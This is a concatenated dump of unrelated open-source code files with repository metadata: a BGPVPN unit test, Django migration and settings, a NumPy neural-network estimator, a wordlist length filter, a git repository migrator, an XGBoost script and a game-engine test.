None, None, None,
context=self.ctxt,
port=None
)
self.assertFalse(self.mock_attach_rpc.called)
self.assertFalse(self.mock_detach_rpc.called)
self.assertTrue(log_exc.called)
def test_format_bgpvpn_network_route_targets(self):
driver = self.bgpvpn_plugin.driver
bgpvpns = [{
'type': 'l3',
'route_targets': ['12345:1', '12345:2', '12345:3'],
'import_targets': ['12345:2', '12345:3'],
'export_targets': ['12345:3', '12345:4']
},
{
'type': 'l3',
'route_targets': ['12345:3', '12346:1']
},
{
'type': 'l2',
'route_targets': ['12347:1']
}]
result = driver._format_bgpvpn_network_route_targets(bgpvpns)
expected = {
'l3vpn': {
'import_rt': ['12345:1', '12345:2', '12345:3', '12346:1'],
'export_rt': ['12345:1', '12345:2', '12345:3', '12345:4',
'12346:1']
},
'l2vpn': {
'import_rt': ['12347:1'],
'export_rt': ['12347:1']
}
}
self.assertItemsEqual(result['l3vpn']['import_rt'],
expected['l3vpn']['import_rt'])
self.assertItemsEqual(result['l3vpn']['export_rt'],
expected['l3vpn']['export_rt'])
self.assertItemsEqual(result['l2vpn']['import_rt'],
expected['l2vpn']['import_rt'])
self.assertItemsEqual(result['l2vpn']['export_rt'],
expected['l2vpn']['export_rt'])
class TestBagpipeServiceDriverV2RPCs(TestBagpipeCommon,
TestBagpipeOVOPushPullMixin):
'''Check RPC push/pull and local registry callback effects'''
def setUp(self):
cfg.CONF.set_override('mechanism_drivers',
['logger', 'fake_agent'],
'ml2')
super(TestBagpipeServiceDriverV2RPCs, self).setUp(
"%s.%s" % (__name__, TestCorePluginML2WithAgents.__name__),
driver=('networking_bgpvpn.neutron.services.service_drivers.'
'bagpipe.bagpipe_v2.BaGPipeBGPVPNDriver'))
@mock.patch.object(resources_rpc.ResourcesPushRpcApi, 'push')
def test_router_itf_event_router_assoc(self, mocked_push):
with self.network() as net, \
self.subnet(network=net) as subnet, \
self.router(tenant_id=self._tenant_id) as router, \
self.bgpvpn() as bgpvpn, \
self.assoc_router(bgpvpn['bgpvpn']['id'],
router['router']['id']):
mocked_push.reset_mock()
itf = self._router_interface_action('add',
router['router']['id'],
subnet['subnet']['id'],
None)
mocked_push.assert_any_call(
mock.ANY,
[AnyOfClass(objs.BGPVPNRouterAssociation)], 'updated')
mocked_push.reset_mock()
itf = self._router_interface_action('remove',
router['router']['id'],
subnet['subnet']['id'],
itf['port_id'])
mocked_push.assert_any_call(
mock.ANY,
[AnyOfClass(objs.BGPVPNRouterAssociation)], 'updated')
@mock.patch.object(resources_rpc.ResourcesPushRpcApi, 'push')
def test_router_itf_event_network_assoc(self, mocked_push):
with self.network() as net, \
self.subnet(network=net) as subnet, \
self.router(tenant_id=self._tenant_id) as router, \
self.bgpvpn() as bgpvpn, \
self.assoc_net(bgpvpn['bgpvpn']['id'],
net['network']['id']):
mocked_push.reset_mock()
itf = self._router_interface_action('add',
router['router']['id'],
subnet['subnet']['id'],
None)
mocked_push.assert_any_call(
mock.ANY,
[AnyOfClass(objs.BGPVPNNetAssociation)], 'updated')
mocked_push.reset_mock()
itf = self._router_interface_action('remove',
router['router']['id'],
subnet['subnet']['id'],
itf['port_id'])
mocked_push.assert_any_call(
mock.ANY,
[AnyOfClass(objs.BGPVPNNetAssociation)], 'updated')
ovos_in_call = mocked_push.mock_calls[0][1][1]
for ovo in ovos_in_call:
if not isinstance(ovo, objs.BGPVPNNetAssociation):
continue
for subnet in ovo.all_subnets(net['network']['id']):
self.assertIsNone(subnet['gateway_mac'])
| apache-2.0 | -7,102,266,521,299,206,000 | 42.697945 | 79 | 0.497157 | false |
Ixxy-Open-Source/django-linkcheck-old | linkcheck/migrations/0001_initial.py | 1 | 1560 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('contenttypes', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Link',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('object_id', models.PositiveIntegerField()),
('field', models.CharField(max_length=128)),
('text', models.CharField(default='', max_length=256)),
('ignore', models.BooleanField(default=False)),
('content_type', models.ForeignKey(to='contenttypes.ContentType')),
],
),
migrations.CreateModel(
name='Url',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('url', models.CharField(unique=True, max_length=255)),
('last_checked', models.DateTimeField(null=True, blank=True)),
('status', models.NullBooleanField()),
('message', models.CharField(max_length=1024, null=True, blank=True)),
('still_exists', models.BooleanField(default=False)),
],
),
migrations.AddField(
model_name='link',
name='url',
field=models.ForeignKey(related_name='links', to='linkcheck.Url'),
),
]
| bsd-3-clause | -7,173,154,571,665,117,000 | 37.04878 | 114 | 0.549359 | false |
FrederikDiehl/NNForSKLearn | NeuralNetwork.py | 1 | 14455 | __author__ = 'Frederik Diehl'
import numpy as np
from sklearn.base import BaseEstimator, RegressorMixin
from sklearn.utils import check_random_state
from sklearn.preprocessing import MinMaxScaler
class NeuralNetwork(BaseEstimator, RegressorMixin, object):
_maxSteps = None
_maxNonChangingSteps = None
_learningRate = None
_shrinkage = None
_architecture = None
_momentum = None
_useDropout = None
_alphaStandout = None
_betaStandout = None
_warmStart = None
_batchSize = None
_weights = None
_inputDimension = None
_outputDimension = None
_step = None
_lastDelta = None
_percentageDropout = None
_inputNormalizer = None
_outputNormalizer = None
def __init__(self, maxSteps=50, maxNonChangingSteps=5, learningRate=1e-6, shrinkage=0.9, architecture=[10],
momentum=0.7, useDropout=False, alphaStandout=0, betaStandout=0.5, warmStart=False,
startingWeights=None, batchSize = 1, step = 0, lastDelta = None, percentageDropout=1):
self._maxSteps = maxSteps
self._maxNonChangingSteps = maxNonChangingSteps
self._learningRate = learningRate
self._shrinkage = shrinkage
self._architecture = architecture
self._momentum = momentum
self._useDropout = useDropout
self._alphaStandout = alphaStandout
self._betaStandout = betaStandout
self._warmStart = warmStart
self._weights = startingWeights
self._batchSize = batchSize
self._step = step
self._lastDelta = None
self._percentageDropout = percentageDropout
def get_params(self, deep=True):
params = {}
params["maxSteps"] = self._maxSteps
params["maxNonChangingSteps"] = self._maxNonChangingSteps
params["learningRate"] = self._learningRate
params["shrinkage"] = self._shrinkage
params["architecture"] = self._architecture
params["momentum"] = self._momentum
params["useDropout"] = self._useDropout
params["alphaStandout"] = self._alphaStandout
params["betaStandout"] = self._betaStandout
params["warmStart"] = self._warmStart
params["batchSize"] = self._batchSize
params["step"] = self._step
params["lastDelta"] = self._lastDelta
params["percentageDropout"] = self._percentageDropout
return params
def _initializeWeights(self, randomState=0):
randomState = check_random_state(randomState)
self._weights = []
for k in range(len(self.neuronsPerLayer())-1):
self._weights.append(np.ones(shape=(self.neuronsPerLayer()[k]+1, self.neuronsPerLayer()[k+1])))
for k in range(len(self.neuronsPerLayer())-1):
for i in range(len(self._weights[k])):
for j in range(len(self._weights[k][i])):
                    #Starting weights are set randomly, dependent on the number of inputs. Compare lecture 17, neuralnetworks slide 10.
self._weights[k][i][j] = randomState.uniform(0, 1)/(self.neuronsPerLayer()[k+1])**0.5
#self._weights[k][i][j] = randomState.uniform(0, 1)
def _batchify(self, X, batchSize, y=None):
#first, set the batches.
#A list of feature matrixes, with the ith column representing the ith example of said feature.
index = 0
batchFeatures = []
#A list of matrices in the one of k coding scheme.
        if y is not None:
batchTargets = []
while index < len(X):
if batchSize != 0:
numberExamples = min(batchSize, len(X) - index)
else:
numberExamples = len(X)
batchFeatures.append(np.ones(shape=(self._inputDimension+1, numberExamples)))
            if y is not None:
batchTargets.append(np.zeros(shape=(self._outputDimension, numberExamples)))
for i in range(numberExamples):
for j in range(self._inputDimension):
batchFeatures[-1][j, i] = X[index, j] #TODO in case of multiple dimensions, break glass.
#Now, set the one out of k training scheme
                if y is not None:
for j in range(self._outputDimension):
batchTargets[-1][j, i] = y[index, j]
#batchTargets[-1][0, i] = y[index]
index += 1
        if y is not None:
return batchFeatures, batchTargets
else:
return batchFeatures
def neuronsPerLayer(self):
neuronsPerLayer = []
neuronsPerLayer.append(self._inputDimension)
neuronsPerLayer.extend(self._architecture)
neuronsPerLayer.append(self._outputDimension)
return neuronsPerLayer
def set_params(self, **parameters):
for parameter, value in parameters.items():
if (parameter == 'maxSteps'):
self._maxSteps = value
elif (parameter == 'maxNonChangingSteps'):
self._maxNonChangingSteps = value
elif (parameter == 'learningRate'):
self._learningRate = value
elif (parameter == 'shrinkage'):
self._shrinkage = value
elif (parameter == 'architecture'):
self._architecture = value
elif (parameter == 'momentum'):
self._momentum = value
elif (parameter == 'useDropout'):
self._useDropout = value
elif (parameter == 'alphaStandout'):
self._alphaStandout = value
elif (parameter == 'betaStandout'):
self._betaStandout = value
elif (parameter == 'warmStart'):
self._warmStart = value
elif (parameter == 'batchSize'):
self._batchSize = value
elif (parameter == 'step'):
self._step = value
elif (parameter == 'lastDelta'):
self._lastDelta = value
elif parameter == 'percentageDropout':
self._percentageDropout = value
return self
def calcLayerOutputsBatch(self, batchFeatures, doDropout, randomState = 0):
randomState = check_random_state(randomState)
dropoutVectors = []
numExamples = batchFeatures.shape[1]
for k in range(len(self.neuronsPerLayer())):
if (k != len(self.neuronsPerLayer())-1):
#if a bias neuron exists.
dropoutVectors.append(np.ones((self.neuronsPerLayer()[k]+1, numExamples)))
else:
#else.
dropoutVectors.append(np.ones((self.neuronsPerLayer()[k], numExamples)))
outputsPerLayer = []
outputsPerLayer.append(batchFeatures)
for k in range(0, len(self._weights)): #All the same except for the output layer.
if (k == len(self._weights)-1): # Do not append the bias.
#outputsPerLayer.append(np.maximum(np.matrix(np.dot(self._weights[k].transpose(), outputsPerLayer[k])), 0))
#outputsPerLayer.append(self.sigmoid(np.dot(self._weights[k].transpose(), outputsPerLayer[k])))
outputsPerLayer.append(self.sigmoid(np.dot(self._weights[k].transpose(), outputsPerLayer[k])))
else: #Do append the bias neuron.
outputsPerLayer.append(np.ones((self.neuronsPerLayer()[k+1]+1, numExamples)))
inputThisLayer = np.dot(self._weights[k].transpose(), outputsPerLayer[k])
#outputsPerLayer[k+1][:self.neuronsPerLayer()[k+1]] = np.maximum(inputThisLayer[:self.neuronsPerLayer()[k+1]], 0)
#print(inputThisLayer)
outputsPerLayer[k+1][:-1] = self.sigmoid(inputThisLayer)
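                # Standout-style adaptive dropout: each unit's keep probability is a sigmoid of its weighted input (alpha * input + beta).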
if (self._useDropout):
dropoutNeuronNumber = int(self.neuronsPerLayer()[k+1]*self._percentageDropout)
dropoutVectors[k+1][:dropoutNeuronNumber] = np.clip(self.sigmoidStandout(self._alphaStandout * inputThisLayer + self._betaStandout), 0, 1)[:dropoutNeuronNumber]
#print(dropoutVectors[k+1])
if (doDropout):
dropoutVectors[k+1] = np.ones((dropoutVectors[k+1].shape[0], dropoutVectors[k+1].shape[1])) * dropoutVectors[k+1] > np.random.rand(dropoutVectors[k+1].shape[0], dropoutVectors[k+1].shape[1])
#print(dropoutVectors[k+1])
outputsPerLayer[k+1] = np.multiply(outputsPerLayer[k+1], dropoutVectors[k+1])
#print(outputsPerLayer[-1])
        return outputsPerLayer, dropoutVectors
def _learnFromBatch(self, batchFeatures, batchTargets):
outputsPerLayer, dropoutVectors = self.calcLayerOutputsBatch(batchFeatures, True)
errorsPerLayer = []
for i in range(len(outputsPerLayer)-1):
errorsPerLayer.append(np.zeros((outputsPerLayer[i].shape[0], len(batchTargets))))
#Set the error for the output layer.
errorsPerLayer.append(batchTargets - outputsPerLayer[-1])
        #Now calculate all of the errors, walking backwards through the layers. Dropout applies to errorsPerLayer too: a neuron that isn't 'active' contributes no error.
for k in range(len(self._weights)-1, -1, -1):
if (k == len(self._weights)-1):
errorsPerLayer[k] = np.dot(self._weights[k], errorsPerLayer[k+1])
else:
errorsPerLayer[k] = np.dot(self._weights[k], errorsPerLayer[k+1][0:-1])
if (self._useDropout):
errorsPerLayer[k] = np.multiply(errorsPerLayer[k], dropoutVectors[k])
#Calculate the deltaW.
deltaW = []
for k in range(len(self._weights)):
deltaW.append(np.zeros(shape=self._weights[k].shape))
for k in range(len(self._weights)-1, -1, -1):
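            # tmp = error * out * (1 - out): the backpropagated error scaled by the logistic-sigmoid derivative expressed via the layer outputs.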
if (k == len(self._weights)-1):
#derivative = 1./(np.exp(-outputsPerLayer[k+1])+1)
#tmp = np.multiply(errorsPerLayer[k+1], derivative).transpose()
tmp = np.multiply(np.multiply(errorsPerLayer[k+1], outputsPerLayer[k+1]), 1-outputsPerLayer[k+1]).transpose()
else:
#derivative = 1./(np.exp(-outputsPerLayer[k+1])+1)
#tmp = np.multiply(errorsPerLayer[k+1], derivative)[0:-1].transpose()
tmp = (np.multiply(np.multiply(errorsPerLayer[k+1], outputsPerLayer[k+1]), 1-outputsPerLayer[k+1]))[0:-1].transpose()
#And again, a neuron which doesn't exist won't cause deltaWs.
if (self._useDropout):
deltaW[k] = np.dot(np.multiply(outputsPerLayer[k], dropoutVectors[k]), tmp)
else:
deltaW[k] = np.dot(outputsPerLayer[k], tmp)
#print(deltaW)
#raw_input()
return deltaW
def fit(self, X, y):
X = np.matrix(X)
y = np.matrix(y)
self._outputNormalizer = MinMaxScaler()
self._inputNormalizer = MinMaxScaler()
self._outputNormalizer = self._outputNormalizer.fit(y)
self._inputNormalizer = self._inputNormalizer.fit(X)
self._inputDimension = X.shape[1]
self._outputDimension = y.shape[1]#For now, hardcoded to 1-dimensional regression problems.
        if (not self._warmStart or self._weights is None):
self._initializeWeights()
self._lastDelta = None
batchFeatures, batchTargets = self._batchify(np.matrix(self._inputNormalizer.transform(X)), self._batchSize,
np.matrix(self._outputNormalizer.transform(y)))
#do for each step until the maximum steps:
for i in range(self._maxSteps):
reducedLearningRate = self._learningRate * self._shrinkage ** self._step
for j in range(len(batchFeatures)):
deltaW = self._learnFromBatch(batchFeatures[j], batchTargets[j])
                if (self._lastDelta is None):
self._lastDelta = deltaW
for k in range(len(self._weights)):
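                    # Momentum update: exponentially weighted average of past weight deltas, applied with the decayed learning rate.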
self._lastDelta[k] = ((1-self._momentum) * deltaW[k] + self._momentum * self._lastDelta[k])
self._weights[k] = self._weights[k] + reducedLearningRate * self._lastDelta[k]
#self._positifyWeights()
self._step += 1
#print(step)
return self
def predict(self, X, debug=False):
X = np.matrix(X)
batchFeatures = self._batchify(self._inputNormalizer.transform(X), self._batchSize)
batchResults = np.zeros((X.shape[0], self._outputDimension))
dropoutResults = []
for k in range(len(self.neuronsPerLayer())):
if (k != len(self.neuronsPerLayer())-1):
#if a bias neuron exists.
dropoutResults.append(np.zeros((self.neuronsPerLayer()[k]+1, 1)))
else:
#else.
dropoutResults.append(np.zeros((self.neuronsPerLayer()[k], 1)))
begin = 0
end = batchFeatures[0].shape[1]
for i in range(len(batchFeatures)):
outputsLast, dropoutFeatures = self.calcLayerOutputsBatch(batchFeatures[i], False)
outputsLast = outputsLast[-1]
batchResults[begin:end, :] = outputsLast.transpose()
begin = end
end = end + batchFeatures[i].shape[1]
#for featureList in batchFeatures:
# outputsLast, dropoutFeatures = self.calcLayerOutputsBatch(featureList, False)
# outputsLast = outputsLast[-1]
# batchResults.extend(list(np.array(outputsLast).reshape(-1,)))
# for i in range(len(dropoutFeatures)):
# summed = np.matrix(np.sum(dropoutFeatures[i], 1)).transpose()
# dropoutResults[i] += summed
batchResults = np.matrix(batchResults)
if (debug):
return self._outputNormalizer.inverse_transform(batchResults), dropoutResults
else:
return self._outputNormalizer.inverse_transform(batchResults)
def sigmoid(self, X):
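        # Fast rational approximation of the sigmoid mapped into (0, 1); the exact logistic form is kept commented out below.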
#return 1 / (1 + np.exp(-X))
return 0.5 * (X/(1+abs(X))+1)
def sigmoidStandout(self, X):
#return 1 / (1 + np.exp(-X))
sigmoidResult = 0.5 * (X/(1+abs(X))+1)
#return 4*(sigmoidResult * (1-sigmoidResult))
return sigmoidResult | mit | 6,231,215,392,406,471,000 | 44.602524 | 214 | 0.590384 | false |
NulledGravity/striptxt | striptxt.py | 1 | 5271 | #!/usr/bin/env python3
# -*- coding: UTF-8 -*-
import os, time, sys
from sys import argv, stdout
# Global variables
INPUT = None
OUTPUT = None
LENGTH = None
VERBOSE = False
AUTOOUT = False
AUTOLEN = False
# Console colors
W = '\033[0m' # white (normal)
R = '\033[31m' # red
G = '\033[92m' # green
B = '\033[34m' # blue
O = '\033[91m' # orange
GR = '\033[94m' # gray
P = '\033[35m' # purple
C = '\033[36m' # cyan
BO = '\033[1m' #bold
def Credits():
os.system('clear')
print(O + ' _____ _ _ _______ _ \n' +
' / ____| | (_) |__ __| | | \n' +
' | (___ | |_ _ __ _ _ __ | |_ _| |_ \n' +
' \___ \| __| \'__| | \'_ \| \ \/ / __| \n' +
' ____) | |_| | | | |_) | |> <| |_ \n' +
' |_____/ \__|_| |_| .__/|_/_/\_\\__| \n' +
' | | \n' +
' |_| \n' + W)
print(W + BO + ' StripTxt v1' + W)
print(C + ' - automated text file word length limiter' + W)
print(C + ' - designed for Linux, for extracting passwords\n of desired length from dictionary files' + W + '\n')
print(B + ' https://github.com/NulledGravity/striptxt' + W + '\n\n')
def VerifyGlobals():
global INPUT, OUTPUT, LENGTH, VERBOSE, AUTOOUT, AUTOLEN
cwd = os.getcwd()
if not INPUT:
print(GR + ' [+] ' + R + 'You must define an input file!')
ExitLikeABitch(0)
    if not os.path.isfile(INPUT):
        print(GR + ' [+] ' + R + 'The input file was not found at the following path!')
        print(GR + '     ' + cwd + os.sep + INPUT)
        ExitLikeABitch(0)
if not OUTPUT:
OUTPUT = 'out.txt'
AUTOOUT = True
if not LENGTH:
LENGTH = 8
AUTOLEN = True
if VERBOSE:
if AUTOOUT:
print(GR + ' [+] ' + W + 'You have not defined an output file!')
print(GR + ' [+] ' + 'The file will be created automatically at:')
print(GR + ' ' + cwd + os.sep + OUTPUT)
if AUTOLEN:
print(GR + ' [+] ' + W + 'You have not defined the desired string length')
print(GR + ' [+] ' + 'The default length will be ' + W + '8')
def ProcessTextFile():
try:
bunchsize = 1000000
bunch = []
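        # Matching lines are buffered and flushed to the output file in bunches to limit the number of write calls.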
with open(INPUT, 'r', encoding='latin-1') as r, open(OUTPUT, 'w', encoding='latin-1') as w:
print('\n' + GR + ' [+] ' + BO + 'starting processing' + W)
i = 0
for line in r:
if len(line) < (LENGTH + 1): continue
bunch.append(line)
PrintStatus(i)
if len(bunch) == bunchsize:
w.writelines(bunch)
bunch = []
i += 1
w.writelines(bunch)
print('\n')
except KeyboardInterrupt:
print('\n' + R + ' (^C) ' + O + 'interrupted\n' + W)
ExitLikeABitch(0)
def PrintStatus(index):
print(GR + ' [+] ' + W + BO + str(index) + W + ' lines processed', end='')
sys.stdout.write('\r')
sys.stdout.flush()
def HandleArguments():
global INPUT, OUTPUT, LENGTH, VERBOSE
args = argv[1:]
if args.count('?') + args.count('-h') + args.count('-help') + args.count('--help') > 0:
Help()
ExitLikeABitch(0)
    try:
        i = 0
        while i < len(args):
            if args[i] == '-l':
                i += 1
                LENGTH = int(args[i])
            elif args[i] == '-i':
                i += 1
                INPUT = args[i]
            elif args[i] == '-o':
                i += 1
                OUTPUT = args[i]
            elif args[i] == '-v':
                VERBOSE = True
            i += 1
    except IndexError:
        print('\n' + R + ' [!] ' + W + 'missing value for the last option\n')
def Help():
HelpIndent('Commands')
HelpIndent('-i' + W + ' <file>' + GR + ' set path to the dictionary', type=1)
HelpIndent('-o' + W + ' <file>' + GR + ' specify path for output, otherwise the file', type=1)
HelpIndent(GR + 'will be saved in the current directory', type=1, spaces=23)
    HelpIndent('-l' + W + ' <length>' + GR + ' the length of strings to be saved, default value: 8', type=1)
HelpIndent('-v' + GR + ' show extra info on run', type=1)
print()
HelpIndent('Example')
HelpIndent(W + 'striptxt.py -i dictionary.txt', type=1)
HelpIndent(W + 'striptxt.py -i dictionary.txt -l 10', type=1)
HelpIndent(W + 'striptxt.py -i dictionary.txt -o newDictionary.txt -l 5', type=1)
print()
HelpIndent('-h, ?, --help, -help' + GR + ' show this help message', type=2)
print()
def HelpIndent(message="", type=0, spaces=4, insidePrint=True):
if type == 1 and spaces == 4: spaces = 8
out = ""
i = 0
for i in range(spaces):
out += ' '
i += 1
if type == 0: out += GR + message.upper()
if type == 1 or type == 2: out += O + message
out += W
if insidePrint:
print(out)
else:
return out
def ExitLikeABitch(code=0):
print(GR + ' [+] ' + W + 'quitting\n')
# GFY BITCH <3
exit(code)
def main():
Credits()
HandleArguments()
VerifyGlobals()
ProcessTextFile()
if __name__ == '__main__':
main() | mit | 3,570,116,909,102,634,000 | 32.157233 | 117 | 0.47012 | false |
erickmendonca/gdg-django-lab | gdg_pizza/wsgi.py | 1 | 1503 | """
WSGI config for gdg_pizza project.
This module contains the WSGI application used by Django's development server
and any production WSGI deployments. It should expose a module-level variable
named ``application``. Django's ``runserver`` and ``runfcgi`` commands discover
this application via the ``WSGI_APPLICATION`` setting.
Usually you will have the standard Django WSGI application here, but it also
might make sense to replace the whole Django WSGI application with a custom one
that later delegates to the Django one. For example, you could introduce WSGI
middleware here, or combine a Django application with an application of another
framework.
"""
import os
# We defer to a DJANGO_SETTINGS_MODULE already in the environment. This breaks
# if running multiple sites in the same mod_wsgi process. To fix this, use
# mod_wsgi daemon mode with each site in its own daemon process, or use
# os.environ["DJANGO_SETTINGS_MODULE"] = "gdg_pizza.settings"
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "gdg_pizza.settings")
# This application object is used by any WSGI server configured to use this
# file. This includes Django's development server, if the WSGI_APPLICATION
# setting points here.
from django.core.wsgi import get_wsgi_application
from dj_static import Cling
application = Cling(get_wsgi_application())
#application = get_wsgi_application()
# Apply WSGI middleware here.
# from helloworld.wsgi import HelloWorldApplication
# application = HelloWorldApplication(application)
| mit | 7,895,412,395,360,587,000 | 40.75 | 79 | 0.790419 | false |
fredyw/git-migrator | gitmigrator.py | 1 | 3703 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2014 Fredy Wijaya
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import sys, os, subprocess, logging, argparse, shutil, stat, errno
logger = None
def execute(cmd):
logger.info('Command: %s' % ' '.join(cmd))
subprocess.check_call(cmd)
def execute_output(cmd):
branches = []
pattern = 'remotes/origin/'
out = subprocess.check_output(cmd)
for line in out.split(os.linesep):
stripped_line = line.strip()
if stripped_line.startswith(pattern):
if stripped_line.startswith(pattern + 'HEAD'): continue
branches.append(stripped_line[len(pattern):])
return branches
# this workaround is needed for Windows
def handle_remove_readonly(func, path, exc):
excvalue = exc[1]
if func in (os.rmdir, os.remove) and excvalue.errno == errno.EACCES:
os.chmod(path, stat.S_IRWXU| stat.S_IRWXG| stat.S_IRWXO) # 0777
func(path)
else:
raise
def migrate(src_repo, dest_repo):
tmp_repo = '.tmprepo'
new_remote = 'newremote'
old_cwd = os.getcwd()
try:
if os.path.exists(tmp_repo):
shutil.rmtree(tmp_repo, ignore_errors=False, onerror=handle_remove_readonly)
execute(['git', 'clone', src_repo, tmp_repo])
os.chdir(tmp_repo)
branches = execute_output(['git', 'branch', '-a'])
execute(['git', 'remote', 'add', new_remote, dest_repo])
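        # Force-push every remote-tracking branch of the source repo as a matching branch on the destination remote.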
for branch in branches:
execute(['git', 'push', new_remote,
'+refs/remotes/origin/' + branch + ':' +
'refs/heads/' + branch])
execute(['git', 'push', new_remote, '--tags'])
finally:
os.chdir(old_cwd)
shutil.rmtree(tmp_repo, ignore_errors=False, onerror=handle_remove_readonly)
def configure_logger():
global logger
FORMAT = '%(asctime)s [%(levelname)-5s] %(message)s'
logging.basicConfig(format=FORMAT, level=logging.INFO)
logger = logging.getLogger('gitmigrator')
def help_formatter():
return lambda prog: argparse.HelpFormatter(prog, max_help_position=30)
def validate_args():
parser = argparse.ArgumentParser(formatter_class=help_formatter())
parser.add_argument('--source', type=str, required=True,
help='source repository URL')
parser.add_argument('--destination', type=str, required=True,
help='destination repository URL')
return parser.parse_args()
if __name__ == '__main__':
configure_logger()
args = validate_args()
try:
migrate(args.source, args.destination)
except Exception as e:
logger.error(str(e))
sys.exit(1)
| mit | -2,902,482,159,053,309,400 | 37.175258 | 88 | 0.662436 | false |
zlpmichelle/crackingtensorflow | template/xgboost/xgboost_stock_pre.py | 1 | 1349 | import sys
import xgboost as xgb
import pandas as pd
import numpy as np
print("----reading data\n")
train = pd.read_csv("train.csv")
train_feature = train.columns[0:-1]
train_label = train.columns[-1]
print("----training a XGBoost\n")
dtrain = xgb.DMatrix(train[train_feature].values, label=train[train_label].values)
param = {'max_depth': 5,
'eta': 1,
'eval_metric': 'auc'}
bst = xgb.train(param, dtrain, 30)
print("----predict stock\n")
fi = open("test.csv", 'r')
fulldata = []
linenum=0
features_num = 500
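# Only the first features_num columns of each row are parsed as numeric features; the full row is also kept as a tab-separated string for the output.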
fea_str =[]
for line in fi:
if linenum%100==0: sys.stderr.write('%f\n' % linenum)
linenum += 1
try:
features = line.strip("\n").split(",")
data = []
inx = 1
        for i in features:  # 'features' is already a list of column strings
if inx > int(features_num):
continue
inx += 1
data.append(float(i))
fulldata.append(data)
fea_str.append('%s' % '\t'.join(features))
except Exception as e:
sys.stderr.write('Exception: %s\n' % str(e))
sys.stderr.write('wrong line: %s\n' % line)
pass
xgb_input = np.array(fulldata)
label = np.array([-1])
test = xgb.DMatrix(xgb_input, label=label)
pred = bst.predict(test)
print("--- print result")
for fs, p in zip(fea_str, pred):
    print(fs + '\t' + str(p) + '\n')
| apache-2.0 | 927,858,347,399,894,100 | 23.089286 | 82 | 0.581913 | false |
whiterabbitengine/fifeplusplus | tests/extension_tests/modelview_tests.py | 1 | 2883 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# ####################################################################
# Copyright (C) 2005-2013 by the FIFE team
# http://www.fifengine.net
# This file is part of FIFE.
#
# FIFE is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the
# Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
# ####################################################################
from extension_test_utils import *
from loaders import *
import time
class TestModelView(unittest.TestCase):
def setUp(self):
self.engine = getEngine()
self.model = self.engine.getModel()
self.metamodel = self.model.getMetaModel()
loadMapFile("content/maps/new_official_map.xml", self.engine)
self.map = self.model.getMaps("id", "OfficialMap")[0]
self.elevation = self.map.getElevations("id", "OfficialMapElevation")[0]
self.layer = self.elevation.getLayers("id", "OfficialMapTileLayer")[0]
imgid = self.layer.getInstances()[0].getObject().get2dGfxVisual().getStaticImageIndexByAngle(0)
img = self.engine.getImagePool().getImage(imgid)
self.screen_cell_w = img.getWidth()
self.screen_cell_h = img.getHeight()
self.camloc = fife.Location(self.layer)
self.camloc.setLayerCoordinates(fife.ModelCoordinate(5,0))
def tearDown(self):
del self.engine
def testModelView(self):
cam = self.engine.getView().addCamera()
cam.setCellImageDimensions(self.screen_cell_w, self.screen_cell_h)
cam.setRotation(45)
cam.setTilt(40)
cam.setLocation(self.camloc)
rb = self.engine.getRenderBackend()
viewport = fife.Rect(0, 0, rb.getScreenWidth(), rb.getScreenHeight())
cam.setViewPort(viewport)
self.engine.getView().resetRenderers()
self.engine.initializePumping()
for count in range(10):
self.engine.pump()
#time.sleep(0.03)
c = self.camloc.getExactLayerCoordinates()
c.x += 0.50
c = self.camloc.setExactLayerCoordinates(c)
cam.setLocation(self.camloc)
self.engine.finalizePumping()
# removed from test set now due to switch to new directory structure -> content moved to clients
# to be considered if this should be taken into use again
TEST_CLASSES = []
if __name__ == '__main__':
unittest.main()
| lgpl-2.1 | -7,791,245,036,448,926,000 | 33.592593 | 97 | 0.673257 | false |
sergei-maertens/bfeu.net | src/bfeu/conf/settings.py | 1 | 8042 | import os
import django.conf.global_settings as DEFAULT_SETTINGS
# Automatically figure out the ROOT_DIR and PROJECT_DIR.
DJANGO_PROJECT_DIR = os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir))
ROOT_DIR = os.path.abspath(os.path.join(DJANGO_PROJECT_DIR, os.path.pardir, os.path.pardir))
#
# Standard Django settings.
#
DEBUG = False
TEMPLATE_DEBUG = DEBUG
ADMINS = (
# ('Your Name', '[email protected]'),
)
MANAGERS = ADMINS
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.', # Add 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.
'NAME': '', # Or path to database file if using sqlite3.
# The following settings are not used with sqlite3:
'USER': '',
'PASSWORD': '',
'HOST': '', # Empty for localhost through domain sockets or '127.0.0.1' for localhost through TCP.
'PORT': '', # Set to empty string for default.
}
}
